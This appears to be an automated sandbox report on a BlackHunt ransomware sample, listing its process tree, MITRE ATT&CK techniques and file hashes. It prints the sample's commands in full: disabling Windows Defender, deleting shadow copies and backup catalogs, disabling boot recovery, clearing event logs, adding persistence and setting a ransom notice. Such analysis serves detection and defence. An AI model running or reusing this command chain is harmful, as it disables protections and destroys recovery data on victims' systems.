f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe 55 PID 1804 wrote to memory of 1156 1804 cmd.exe 95 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe"C:\Users\Admin\AppData\Local\Temp\f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe"1⤵
- UAC bypass
- Modifies extensions of user files
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2040 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Black" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1816 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Black" /f3⤵
- Modifies registry class
PID:1512
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Black\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵PID:1576
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Black\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵PID:628
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Black" /f2⤵PID:1252
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Black" /f3⤵
- Modifies registry class
PID:332
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Black\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵PID:1612
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Black\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:1296
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵PID:964
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵PID:608
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵PID:892
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:1824
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵PID:1404
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵PID:1384
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:1756
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:1416
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:1804
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:1156
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:1740
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:1984
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:1516
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:628
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:1764
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:1108
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:1268
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵
- Suspicious use of WriteProcessMemory
PID:964
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:1748
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:1588
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:272
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:980
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:924
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵
- Adds Run key to start application
PID:608
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:1664
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:1104
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:1580
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:1416
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:1380
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:1492
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:1504
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:296
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:1080
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:1384
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:1824
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:1540
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:1216
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:760
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:740
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:1584
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:1984
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:1664
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1804 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:1492
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1608
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:296
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:1568
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:1640
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:1600
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:1592
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityService" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe -backups " /f2⤵PID:1616
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityService" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe -backups " /f3⤵
- Adds Run key to start application
PID:1416
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SchTasks.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Update service Windows System" /TR "C:\Users\Admin\AppData\Local\Temp\f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe -backups" /f2⤵PID:1784
-
C:\Windows\system32\schtasks.exeSchTasks.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Update service Windows System" /TR "C:\Users\Admin\AppData\Local\Temp\f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe -backups" /f3⤵
- Creates scheduled task(s)
PID:1444
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:1620
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:1680
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:1268
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:1676
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:1352
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:924
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:1756
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
- Suspicious use of WriteProcessMemory
PID:1612
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:1472
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:828
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:932
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:240
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:1340
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:640
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:1544
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:2044
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:1212
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2080
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:1804
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1720
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:1404
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2332
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:1880
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2276
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:1004
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2252
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:272
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:2340
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:1232
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:2324
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG DELETE "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "HealthService" /f2⤵PID:1680
-
C:\Windows\system32\reg.exeREG DELETE "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "HealthService" /f3⤵PID:2204
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:1320
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:2176
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:1640
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:2348
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:332
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:2244
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:236
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:2260
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:228
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:2160
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:220
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:2224
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:212
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:2236
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:204
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:2356
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:2008
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2296
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:2060
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:2288
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵PID:2092
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta"3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2544
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c start /min cmd /c del /F C:\Users\Admin\AppData\Local\Temp\f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe2⤵PID:2132
-
C:\Windows\SysWOW64\cmd.execmd /c del /F C:\Users\Admin\AppData\Local\Temp\f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe3⤵
- Deletes itself
PID:2168
-
-
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-38425080-4231391175544846691912371148-461802385-1294558055798302508193687780"1⤵PID:1156
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1851287083299396040463639429-127060770416142287341314316893-1300521235531257176"1⤵
- Modifies registry class
PID:628
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1128246194-66301399-1328875689-172510841524656510518998237022075483028280260326"1⤵PID:1404
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1984
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:288
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:1076
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:980
Network
MITRE ATT&CK Enterprise v6
Persistence
Modify Existing Service
1Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
Bypass User Account Control
1Disabling Security Tools
2File Deletion
3Indicator Removal on Host
1Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
10KB
MD50e82c5ac0814f077abbea2a4d221eea4
SHA1ecc1ebb3b7b095a45a511919b27183a0bfc4dbaf
SHA25607e77352bef58a2b0cfc6a8f113252baa063e853eca217cace79b3e20cc517b1
SHA51208992a378f39f5aac06fd248d43a9df53a7f29876ae9bd8b71070700a410068f07d4f7ffaee9c0db4eb8cf0e4b81b01918d8bcc9b698f9e72b1558b99b00e100
-
Filesize
687B
MD5da576ad53c030f87ae35d0f4803e9abc
SHA1b45589f9ffdeabf2028ad70a74dc29ce61f6cda6
SHA256d89ce988030a293062ff86fa0cf864198ab0c742627b5ec914fdfa048d106d39
SHA5122134930ebad095bf36e4902726ec618c6211fea61eb6bebe804b812e8a8673f608ea1b9740560b76fe98b3d0d1cbd8be1735b10e453b4e351e473ab100cb6aa1